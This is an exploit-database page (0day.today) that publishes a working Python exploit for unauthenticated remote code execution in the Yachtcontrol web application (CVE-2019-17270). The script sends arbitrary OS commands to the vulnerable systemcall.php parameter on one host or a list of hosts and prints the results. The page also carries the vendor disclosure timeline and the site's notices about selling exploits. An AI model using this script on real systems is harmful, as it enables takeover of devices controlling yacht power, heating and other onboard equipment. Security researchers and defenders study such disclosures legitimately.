0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Yachtcontrol Webapplication 1.0 - Remote Code Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Yachtcontrol Webapplication - Unauthenticated Remote Code Execution # Exploit Author: Hodorsec # Vendor Homepage: http://www.yachtcontrol.nl/en/ # Software Link: http://download.yachtcontrol.nl/klant/Software/ & http://download.yachtcontrol.nl/klant/Firmware/ # Versions: Yachtcontrol webapplication through versions dated on 2019-10-06 # Tested on: Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's. # CVE: CVE-2019-17270 # # Description Product: # Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication, # it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components. # Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht. # Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices. # # Description Vulnerability: # It's possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" # page and parameter, where {COMMAND} will be executed and returning the results to the client. # # Affected Components: # Yachtcontrol webservers using the custom PHP webapplication, versions until 2019-10-06. #!/usr/bin/python import sys,os,requests # Check arguments if len(sys.argv) != 5: print "Error: enter at least one IP/FQDN as argument. Exiting..." print "\nUsage: " + sys.argv[0] + " {IP/FQDN} {PORT} {PROTO} {COMMAND}\n" exit(0) # Parameters host = sys.argv[1] port = sys.argv[2] proto = sys.argv[3] command = sys.argv[4] timeout = 10 isFile = False # Check for file or single IP/FQDN if os.path.isfile(host): isFile = True with open(host) as f: targets = f.readlines() # Vulnerable page page = "/pages/systemcall.php?command=" # HTTP or HTTPS if proto == "http": proto = "http://" elif proto == "https": proto = "https://" else: print "\nInvalid method given: enter http or https\n" exit(0) # Do the request if isFile: for host in targets: target = host.strip() print target try: response = requests.get(proto + target + ":" + port + page + command, verify=False, timeout=timeout) print(response.content.replace('executing command: ' + command,'')) except requests.exceptions.Timeout: print "Timed out." pass except requests.exceptions.RequestException as e: print "Host not found." pass else: try: response = requests.get(proto + host + ":" + port + page + command, verify=False, timeout=timeout) print(response.content.replace('executing command: ' + command,'')) except requests.exceptions.Timeout: print "Timed out." pass except requests.exceptions.RequestException as e: print "Host not found." pass # Disclosure Timeline using CERT/CC disclosure policy: # - 06-10-19: Requested CVE # - 06-10-19: Contacted vendor for initial contact, used several publicly known mailaddresses # - 12-10-19: Sent reminder due to no response # - 06-11-19: Sent second reminder due to no response # - 08-11-19: Received response requesting information, sent information # - 11-11-19: Correspondence concerning vulnerability # - 25-11-19: Sent reminder of publishing PoC to vendor, received response # - 05-12-19: Sent final reminder of publishing PoC to vendor # - 06-12-19: Public Disclosure # 0day.today [2024-09-28] #